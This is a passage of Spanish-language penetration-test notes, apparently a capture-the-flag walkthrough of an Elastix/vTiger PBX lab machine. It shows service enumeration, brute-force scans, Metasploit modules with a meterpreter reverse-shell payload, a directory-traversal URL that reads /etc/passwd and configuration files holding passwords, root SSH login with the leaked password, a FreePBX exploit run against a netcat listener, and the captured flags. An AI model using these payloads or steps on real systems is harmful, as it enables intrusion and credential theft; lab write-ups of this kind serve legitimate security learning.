	/themes/elastixwine/_common/_alert_container_information.tpl
	/themes/giox/_common/_alert_container_confirmation.tpl
	/themes/giox/_common/_alert_container_error.tpl
	/themes/elastixwine/_common/_list.tpl
	/themes/giox/_common/_alert_container_information.tpl
	/themes/elastixwine/_common/_menu.tpl
	/themes/giox/_common/_list.tpl
	/themes/elastixwine/_common/help.tpl
	/themes/elastixwine/_common/index.tpl
	/themes/giox/_common/_menu.tpl
	/themes/slashdot/_common/_alert_container_confirmation.tpl
	/themes/elastixwine/_common/listcsv.tpl
	/themes/giox/_common/help.tpl
	/themes/slashdot/_common/_alert_container_error.tpl
	/themes/elastixwine/_common/login.tpl
	/themes/giox/_common/index.tpl
	/themes/slashdot/_common/_alert_container_information.tpl
	/themes/elastixwine/_common/popup.tpl
	/themes/giox/_common/listcsv.tpl
	/themes/slashdot/_common/_list.tpl
	/themes/giox/_common/login.tpl
	/themes/slashdot/_common/_menu.tpl
	/themes/giox/_common/popup.tpl
	/themes/slashdot/_common/help.tpl
	/themes/slashdot/_common/index.tpl
	/themes/slashdot/_common/listcsv.tpl
	/themes/slashdot/_common/login.tpl
	/themes/slashdot/_common/popup.tpl
	/config.php
	/
	/images/
	/help/
	/icons/
	/themes/
	/themes/elastixneo/
	/themes/elastixneo/images/
	/themes/al/
	/themes/default/
	/themes/elastixneo/_common/
	/themes/elastixblue/
	/modules/
	/themes/elastixeasy-Black/
	/themes/elastixeasy-Blue/
	/themes/elastixeasy-Orange/
	/themes/elastixeasy-Red/
	/themes/elastixeasy-Violet/
	/themes/elastixwave/
	/themes/elastixwine/
	/themes/giox/
	/themes/slashdot/
	/themes/al/_common/
	/themes/default/_common/
	/themes/elastixblue/_common/
	/themes/al/images/
	/themes/elastixeasy-Blue/_common/
	/themes/elastixeasy-Black/_common/
	/themes/elastixeasy-Orange/_common/
	/mail/
	/themes/elastixeasy-Blue/images/
	/themes/default/images/
	/themes/elastixeasy-Red/_common/
	/themes/elastixeasy-Violet/_common/
	/themes/elastixblue/images/
	/themes/elastixeasy-Black/images/
	/themes/elastixeasy-Red/images/
	/themes/elastixeasy-Orange/images/
	/themes/elastixwave/_common/
	/themes/elastixeasy-Violet/images/
	/themes/elastixwave/images/
	/themes/elastixwine/_common/
	/themes/giox/_common/
	/themes/slashdot/_common/
	/themes/giox/images/
	/themes/elastixwine/images/
	/themes/slashdot/images/
	/static/
	/pipermail/
	/lang/
	/var/
	/panel/
	/libs/
	/recordings/
	/configs/
	/vtigercrm/



-- Con la aplicacion Whatweb

	whatweb 10.10.10.7

	http://10.10.10.7 [302 Found] Apache[2.2.3], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], 
	IP[10.10.10.7], RedirectLocation[https://10.10.10.7/], Title[302 Found]
	ERROR Opening: https://10.10.10.7/ - SSL_connect returned=1 errno=0 state=error: dh key too small

-- Con la aplicacion searchsploit

	searchsploit apache 2.2.3
	----------------------------------------------------------------------------- ----------------------------------------
	 Exploit Title                                                               |  Path
																				 | (/usr/share/exploitdb/)
	----------------------------------------------------------------------------- ----------------------------------------
	Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow                   | exploits/multiple/remote/2237.sh
	Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                             | exploits/linux/webapps/42745.py
	Apache Struts 2.2.3 - Multiple Open Redirections                             | exploits/multiple/remote/38666.txt
	----------------------------------------------------------------------------- ----------------------------------------
	(No se consigue nada)
	
-- Con la aplicacion msfconsole:

*para las platadorma Elastix, suele funcionar en siguiente exploit.
	msf5 > search vtiger			

	Matching Modules
	================

	   #  Name                                        Disclosure Date  Rank       Check  Description
	   -  ----                                        ---------------  ----       -----  -----------
	   0  exploit/multi/http/vtiger_install_rce       2014-03-05       manual     No     Vtiger Install Unauthenticated Remote Command Execution
	   1  exploit/multi/http/vtiger_logo_upload_exec  2015-09-28       excellent  Yes    Vtiger CRM - Authenticated Logo Upload RCE
	   2  exploit/multi/http/vtiger_php_exec          2013-10-30       excellent  Yes    vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
	   3  exploit/multi/http/vtiger_soap_upload       2013-03-26       excellent  Yes    vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload

			El 0 y el 2 , no funcionan.
			El 1 nos falta el usuario y password.
			El 3 teoricamente funciona pero a mi no.

		use exploit/multi/http/vtiger_soap_upload 

		show options 

		Module options (exploit/multi/http/vtiger_soap_upload):

			Name       Current Setting  Required  Description
			----       ---------------  --------  -----------
			Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
			RHOSTS     10.10.10.7       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
			RPORT      443              yes       The target port (TCP)
			SSL        true             no        Negotiate SSL/TLS for outgoing connections
			TARGETURI  /vtigercrm/      yes       Base vTiger CRM directory path
			VHOST                       no        HTTP server virtual host


	Payload options (php/meterpreter/reverse_tcp):

		Name   Current Setting  Required  Description
		----   ---------------  --------  -----------
		LHOST  10.10.14.8       yes       The listen address (an interface may be specified)
		LPORT  4444             yes       The listen port


	Exploit target:

		Id  Name
		--  ----
		0   vTigerCRM v5.4.0

	* Se consigue una consola de meterpteter como usuario vtigercrm.
		

----- POP3: Por el puerto 110 y 995 y version Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 ------------------------------------

-- Aplicacion telnet

	telnet 10.10.10.7 110
	Trying 10.10.10.7...
	telnet: Unable to connect to remote host: Connection refused
	
	telnet 10.10.10.7 995                                                                   
	Trying 10.10.10.7...
	Connected to 10.10.10.7.
	Escape character is '^]'.
	-ERR [SYS/PERM] Fatal error: tls_init() failed
	Connection closed by foreign host.

-- Aplicacion netcat

	nc -vn 10.10.10.7 110
	(UNKNOWN) [10.10.10.7] 110 (pop3) : Connection refused
	
	nc -vn 10.10.10.7 995
	(UNKNOWN) [10.10.10.7] 995 (pop3s) open
	-ERR [SYS/PERM] Fatal error: tls_init() failed

-- Aplicacion NMAP:

	nmap -p110,995 --script *pop3*.nse 10.10.10.7

	PORT    STATE SERVICE
	110/tcp open  pop3
	| pop3-brute: 
	|   Accounts: No valid accounts found
	|_  Statistics: Performed 290 guesses in 625 seconds, average tps: 0.4
	|_pop3-capabilities: RESP-CODES PIPELINING TOP IMPLEMENTATION(Cyrus POP3 server v2) STLS USER EXPIRE(NEVER) UIDL APOP LOGIN-DELAY(0) AUTH-RESP-CODE
	995/tcp open  pop3s
	| pop3-brute: 
	|   Accounts: No valid accounts found
	|   Statistics: Performed 5 guesses in 21 seconds, average tps: 0.2
	|_  ERROR: Failed to make a pop-connection.

----- RPCBIND: Por el puerto 111 y 879 y Version 2 (RPC #100000) ------------------------------------

-- Aplicacion NMAP

	nmap -v --script=*rpc*.nse -p111,879 10.10.10.7
	
	PORT    STATE SERVICE
	111/tcp open  rpcbind
	879/tcp open  status
	
	nmap -p111,879 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.10.7
	
	PORT    STATE SERVICE                                                                                        
	111/tcp open  rpcbind                                                                                        
	879/tcp open  unknown
	
	nmap -sSUC -p111,879 10.10.10.7
	
	PORT    STATE  SERVICE                                                                                       
	111/tcp open   rpcbind                                                                                       
	879/tcp open   unknown                                                                                       
	111/udp open   rpcbind                                                                                       
	879/udp closed unknown

-- Aplicacion RPCINFO.

	rpcinfo -p 10.10.10.7 
	
	program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp    876  status
    100024    1   tcp    879  status
	
	-- Aplicacion RPCCLIENT.

	rpcclient -U "" 10.10.10.7
	Enter WORKGROUP\'s password: 
	Cannot connect to server.  Error was NT_STATUS_CONNECTION_REFUSED

	rpcclient -U "" -N 10.10.10.7
	Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT
	
	rpcclient -U "" -N 10.10.10.7 -W “WORKGROUP” -c querydispinfo

-- Aplicacion RPC_SCAN.

	Fuente: https://github.com/hegusung/RPCScan
	python3 rpc-scan.py 10.10.10.7 --rpc
	
	rpc://10.10.10.7:111    Portmapper
	RPC services for 10.10.10.7:
	portmapper (100000)            2          tcp        111       
	portmapper (100000)            2          udp        111       
	status monitor 2 (100024)      1          udp        876       
	status monitor 2 (100024)      1          tcp        879  
	
	
	python3 rpc-scan.py 10.10.10.7 --mounts
	rpc://10.10.10.7:111    Portmapper
	Exports for 10.10.10.7:
	
-- Aplicacion NIS.

	ypcat -d kali -h 10.10.10.7 passwd.byname
	No such map passwd.byname. Reason: Can't communicate with portmapper

-- Aplicacion SHOWMOUNT.

	showmount -e 10.10.10.7
	clnt_create: RPC: Program not registered

----- IMAP: Por el puerto 143-993 y Version Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4) ------------------------------------

-- Aplicacion NMAP:

	nmap --script=*imap*.nse -p143,993 10.10.10.7

	PORT    STATE SERVICE
	143/tcp open  imap
	| imap-brute: 
	|   Accounts: No valid accounts found
	|   Statistics: Performed 20 guesses in 455 seconds, average tps: 0.1
	|_  ERROR: The service seems to have failed or is heavily firewalled...
	|_imap-capabilities: ANNOTATEMORE SORT MAILBOX-REFERRALS STARTTLS QUOTA THREAD=ORDEREDSUBJECT UNSELECT
	Completed OK X-NETSCAPE NAMESPACE URLAUTHA0001 ID LISTEXT IDLE CATENATE ACL NO CONDSTORE BINARY 
	LIST-SUBSCRIBED SORT=MODSEQ IMAP4 IMAP4rev1 CHILDREN ATOMIC MULTIAPPEND RENAME UIDPLUS THREAD=REFERENCES
	LITERAL+ RIGHTS=kxte
	
	993/tcp open  imaps
	| imap-brute: 
	|   Accounts: No valid accounts found
	|_  Statistics: Performed 283 guesses in 627 seconds, average tps: 0.3
	|_imap-capabilities: CAPABILITY


-- Aplicacion Telnet:

	telnet 10.10.10.7 143
	Trying 10.10.10.7...
	Connected to 10.10.10.7.
	Escape character is '^]'.
	* OK [CAPABILITY IMAP4 IMAP4rev1 LITERAL+ ID STARTTLS] example.com Cyrus IMAP4 v2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 server ready

	telnet 10.10.10.7 993
	Trying 10.10.10.7...
	Connected to 10.10.10.7.
	Escape character is '^]'.
	* BYE Fatal error: tls_init() failed
	Connection closed by foreign host.

-- Aplicacion netcat:

	nc -nv 10.10.10.7 143
	(UNKNOWN) [10.10.10.7] 143 (imap2) open

	nc -nv 10.10.10.7 993
	(UNKNOWN) [10.10.10.7] 993 (imaps) open


----- MySQL : Por el puerto 3306 y MySQL  ---------------

-- Aplicacion NMAP:

nmap --script=*mysql*.nse -p3306 10.10.10.7

	PORT     STATE SERVICE
	3306/tcp open  mysql
	| mysql-brute: 
	|   Accounts: No valid accounts found
	|   Statistics: Performed 0 guesses in 6 seconds, average tps: 0.0
	|_  ERROR: The service seems to have failed or is heavily firewalled...
	|_mysql-empty-password: ERROR: Script execution failed (use -d to debug)
	| mysql-enum: 
	|   Accounts: No valid accounts found
	|   Statistics: Performed 0 guesses in 6 seconds, average tps: 0.0
	|_  ERROR: The service seems to have failed or is heavily firewalled...
	|_mysql-info: ERROR: Script execution failed (use -d to debug)
	|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

-- Aplicacion METASPLOIT.

	msf> use auxiliary/scanner/mysql/mysql_login
	[-] 10.10.10.7:3306       - 10.10.10.7:3306 - Unsupported target version of MySQL detected. Skipping.
	[*] 10.10.10.7:3306       - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed

	msf> use auxiliary/scanner/mysql/mysql_writable_dirs
	[!] 10.10.10.7:3306       - For every writable directory found, a file called ROTDUDEG with the text test will be written to the directory.
	[*] 10.10.10.7:3306       - Login...
	[-] 10.10.10.7:3306       - Unable to login from this host due to policy
	[-] 10.10.10.7:3306       - Unable to login to the server.
	[*] 10.10.10.7:3306       - Scanned 1 of 1 hosts (100% complete)
	
	msf> use auxiliary/scanner/mysql/mysql_version
	[-] 10.10.10.7:3306       - The connection to 10.10.10.7:3306 timed out
	[*] 10.10.10.7:3306       - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
	
	msf> use uxiliary/scanner/mysql/mysql_authbypass_hashdump
	[-] 10.10.10.7:3306       - 10.10.10.7:3306 Unable to login from this host due to policy (may still be vulnerable)
	[*] 10.10.10.7:3306       - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed

	msf> use auxiliary/scanner/mysql/mysql_hashdump
	[-] 10.10.10.7:3306       - Unable to login from this host due to policy
	[*] 10.10.10.7:3306       - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed

	msf> use auxiliary/admin/mysql/mysql_enum
	[*] Running module against 10.10.10.7
	[-] 10.10.10.7:3306 - Unable to login from this host due to policy
	[*] Auxiliary module execution completed

	msf> use auxiliary/scanner/mysql/mysql_schemadump
	[-] 10.10.10.7:3306       - Unable to login from this host due to policy
	[*] 10.10.10.7:3306       - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed

	msf> use exploit/windows/mysql/mysql_start_up 
	[*] 10.10.10.7:3306 - Attempting to login as '/usr/share/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt:/usr/share/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt'
	[-] 10.10.10.7:3306 - Unable to login from this host due to policy
	[-] 10.10.10.7:3306 - Exploit aborted due to failure: no-access: 10.10.10.7:3306 - Unable to Login

-- Aplicacion PATATOR, fuerza bruta.

	patator mysql_query host=10.10.10.7 user=root password=s3cr3t query="select length(load_file('/home/adam/FILE0'))" 0=/usr/share/legion/wordlists/mysql-default-userpass.txt -x ignore:size=0 
	patator mysql_query host=10.10.10.7 user=root password=s3cr3t query="select length(load_file('/home/adam/FILE0'))" 0=/usr/share/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt -x ignore:size=0 
	(NO se consigue ninguna clave).


----- sieve : Por el puerto 4190 y Version Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 

-- Aplicacion searchsploit.

	searchsploit cyrus
	-------------------------------------------------------------------- ----------------------------------------
	Exploit Title                                                      |  Path
                                                                    | (/usr/share/exploitdb/)
	-------------------------------------------------------------------- ----------------------------------------
	Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit) | exploits/linux/remote/16836.rb
	Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap  | exploits/linux/dos/22061.txt
	Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)              | exploits/linux/remote/1813.c
	Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (2)              | exploits/multiple/remote/2053.rb
	Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)              | exploits/linux/remote/2185.pl
	Cyrus IMSP Daemon 1.x - Remote Buffer Overflow                      | exploits/linux/remote/23441.c
	Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution              | exploits/linux/remote/139.c
	Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow         | exploits/linux/remote/903.c
	-------------------------------------------------------------------- ----------------------------------------
	* No es valido ninguno.
	
	
----- upnotifyp? : Por el puerto 4445 y Version upnotifyp?   ----------
	* No se encuentra nada.

----- hylafax : Por el puerto 4559 y Version HylaFAX 4.3.10   ----------

-- Aplicacion searchsploit.
	-------------------------------------------------------------------- ----------------------------------------
	Exploit Title                                                      |  Path
                                                                    | (/usr/share/exploitdb/)
	-------------------------------------------------------------------- ----------------------------------------
	HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow                            | exploits/linux/dos/28683.txt
	Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution                | exploits/unix/remote/20462.txt
	Hylafax 4.1.x - HFaxD Format String                                 | exploits/linux/remote/23371.c
	Hylafax 4.1/4.2 (Multiple Scripts) - Remote Command Execution       | exploits/linux/remote/27032.txt
	Hylafax Hylafax 4.0.2 - Local Buffer Overflow                       | exploits/unix/local/19590.c
	-------------------------------------------------------------------- ----------------------------------------
	* No es valido ninguno.

----- asterisk : Por el puerto 5038 y Version Asterisk Call Manager 1.1  ----------

-- Aplicacion searchsploit.
	searchsploit asterisk
	* No es valido ninguno.


----- snet-sensor-mgmt : Por el puerto 10000 y Version MiniServ 1.570 (Webmin httpd) ----------
-- Aplicacion searchsploit.
	-------------------------------------------------------------------- ----------------------------------------
	Exploit Title                                                      |  Path
                                                                   | (/usr/share/exploitdb/)
	-------------------------------------------------------------------- ----------------------------------------
	DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal     | exploits/cgi/webapps/23535.txt
	Webmin - Brute Force / Command Execution                            | exploits/multiple/remote/705.pl
	Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing         | exploits/linux/remote/22275.pl
	Webmin 0.x - 'RPC' Privilege Escalation                             | exploits/linux/remote/21765.pl
	Webmin 0.x - Code Input Validation                                  | exploits/linux/local/21348.txt
	Webmin 1.5 - Brute Force / Command Execution                        | exploits/multiple/remote/746.pl
	Webmin 1.5 - Web Brute Force (CGI)                                  | exploits/multiple/remote/745.pl
	Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploi | exploits/unix/remote/21851.rb
	Webmin 1.850 - Multiple Vulnerabilities                             | exploits/cgi/webapps/42989.txt
	Webmin 1.900 - Remote Command Execution (Metasploit)                | exploits/cgi/remote/46201.rb
	Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasplo | exploits/linux/remote/46984.rb
	Webmin 1.920 - Remote Code Execution                                | exploits/linux/webapps/47293.sh
	Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)   | exploits/linux/remote/47230.rb
	Webmin 1.x - HTML Email Command Execution                           | exploits/cgi/webapps/24574.txt
	Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)  | exploits/multiple/remote/1997.php
	Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | exploits/multiple/remote/2017.pl
	phpMyWebmin 1.0 - 'target' Remote File Inclusion                    | exploits/php/webapps/2462.txt
	phpMyWebmin 1.0 - 'window.php' Remote File Inclusion                | exploits/php/webapps/2451.txt
	webmin 0.91 - Directory Traversal                                   | exploits/cgi/remote/21183.txt
	-------------------------------------------------------------------- ----------------------------------------
	

+++++ FASE DE EXPLOTACION ++++++++++++++++++++++++++++++++++++++++++++++++++++++++

//////////////////////////// OPCION 1 ////////////////////////////////////////////

Con la aplicacion dirb, hay un directorio /vtigercrm/ (es un servicio de acceso)

	https://10.10.10.7/vtigercrm/
	Al acceder nos muestra que es a versión vtiger CRM 5.1.0
	
	searchsploit vtiger 5.1.0
	------------------------------------------------------------------------------------------------------ ----------------------------------------
	 Exploit Title                                                                                        |  Path
																										  | (/usr/share/exploitdb/)
	------------------------------------------------------------------------------------------------------ ----------------------------------------
	vTiger CRM 5.1.0 - Local File Inclusion                                                               | exploits/php/webapps/18770.txt
	------------------------------------------------------------------------------------------------------ ----------------------------------------
	Leer el fichero 18770.txt
	Y comenta que exite una vulnerabilidad añadiendo este texto https://hosts/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
	Nos muestra el contenido del fichero /etc/passwd, donde están los usuarios.
	
	root:x:0:0:root:/root:/bin/bash 
	bin:x:1:1:bin:/bin:/sbin/nologin 
	daemon:x:2:2:daemon:/sbin:/sbin/nologin 
	adm:x:3:4:adm:/var/adm:/sbin/nologin 
	lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 
	sync:x:5:0:sync:/sbin:/bin/sync 
	shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
	halt:x:7:0:halt:/sbin:/sbin/halt 
	mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 
	news:x:9:13:news:/etc/news: 
	uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 
	operator:x:11:0:operator:/root:/sbin/nologin 
	games:x:12:100:games:/usr/games:/sbin/nologin 
	gopher:x:13:30:gopher:/var/gopher:/sbin/nologin 
	ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
	nobody:x:99:99:Nobody:/:/sbin/nologin 
	mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash 
	distcache:x:94:94:Distcache:/:/sbin/nologin 
	vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin 
	pcap:x:77:77::/var/arpwatch:/sbin/nologin 
	ntp:x:38:38::/etc/ntp:/sbin/nologin 
	cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash 
	dbus:x:81:81:System message bus:/:/sbin/nologin 
	apache:x:48:48:Apache:/var/www:/sbin/nologin 
	mailman:x:41:41:GNU Mailing List 
	Manager:/usr/lib/mailman:/sbin/nologin 
	rpc:x:32:32:Portmapper 
	RPC user:/:/sbin/nologin 
	postfix:x:89:89::/var/spool/postfix:/sbin/nologin 
	asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash 
	rpcuser:x:29:29:RPC Service 
	User:/var/lib/nfs:/sbin/nologin 
	nfsnobody:x:65534:65534:Anonymous NFS 
	User:/var/lib/nfs:/sbin/nologin 
	sshd:x:74:74:Privilege-separated 
	SSH:/var/empty/sshd:/sbin/nologin 
	spamfilter:x:500:500::/home/spamfilter:/bin/bash 
	haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
	xfs:x:43:43:X Font 	Server:/etc/X11/fs:/sbin/nologin 
	fanis:x:501:501::/home/fanis:/bin/bash 
	
	Probar a leer el fichero de contraseñas:
	https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/shadow%00
	No nos muestra.
	Probar a leer el fichero de grupos:
	https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/group%00
	Si nos muestra.
	
	Probar a leer el fichero de configuracion de vtiger.
	https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00
	
	AMPDBHOST=localhost
	AMPDBENGINE=mysql
	# AMPDBNAME=asterisk
	AMPDBUSER=asteriskuser
	# AMPDBPASS=amp109
	AMPDBPASS=jEhdIekWmdjE
	AMPENGINE=asterisk
	AMPMGRUSER=admin
	#AMPMGRPASS=amp111
	AMPMGRPASS=jEhdIekWmdjE
	#FOPRUN=true
	FOPWEBROOT=/var/www/html/panel
	#FOPPASSWORD=passw0rd
	FOPPASSWORD=jEhdIekWmdjE
	
	ARI_ADMIN_USERNAME=admin
	ARI_ADMIN_PASSWORD=jEhdIekWmdjE
	
	Con los datos anteriores de usuario y password, probar a acceder por ssh.
	# ssh root@10.10.10.7  password jEhdIekWmdjE
	Se consigue aceder como root.
	
//////////////////////////// OPCION 2 ////////////////////////////////////////////	
	
	Intentar descargar el fichero de configuracion de Asterix
	https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
	[general]
	enabled = yes
	port = 5038
	bindaddr = 0.0.0.0
	displayconnects=no ;only effects 1.6+

	[admin]
	secret = jEhdIekWmdjE
	deny=0.0.0.0/0.0.0.0
	permit=127.0.0.1/255.255.255.0
	read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
	write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

	#include manager_additional.conf
	#include manager_custom.conf
	
	Se consige usuario admin y password jEhdIekWmdjE

	
//////////////////////////// OPCION 3 ////////////////////////////////////////////		
	
	Comprobar que la version elastix, es la version 2.2.0, esta tiene una vulnerabilidad.
	
	searchsploit elastix 2.2
	------------------------------------------------------------------------------------------------------- ----------------------------------------
	Exploit Title                                                                                      	   	| Path             
																											| (/usr/share/exploitdb/)
	------------------------------------------------------------------------------------------------------- ----------------------------------------
	Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                     	| exploits/php/webapps/37637.pl
	FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                              	| exploits/php/webapps/18650.py
	------------------------------------------------------------------------------------------------------- ----------------------------------------
	Funciona el exploit exploits/php/webapps/18650.py
	Editar y modificar lhost, rhost y extension.
		
	El parametro extesion se obtiene al ejecutar svwar: el escáner de líneas de extensión Sipvicious escanea los PaBX SIP en busca de líneas de extensión válidas.
	La web de Sipvicious es: https://github.com/EnableSecurity/sipvicious
		python svwar.py -e100-300 10.10.10.7 --force -m INVITE
		WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
		| Extension | Authentication |
		------------------------------
		| 233       | reqauth        |
		
	Si da error de certificado añadir:
	import ssl
	ssl._create_default_https_context = ssl._create_unverified_context	
	En otra consola ejecutar:
	nc -lvnp 443
	
	Ejecutar:
	python 18650.py
	
	id
	uid=100(asterisk) gui=101 (asterisk) 
	
	
+++++ FASE DE POSTEXPLOTACION ++++++++++++++++++++++++++++++++++++

	FLAG USUARIO:
	$ cat /home/fanis/user.txt
	aeff3def0c765c2677b94715cffa73ac

	FLAG ROOT:
	$ cat /root/root.txt
	d88e006123842106982acce0aaf453f0

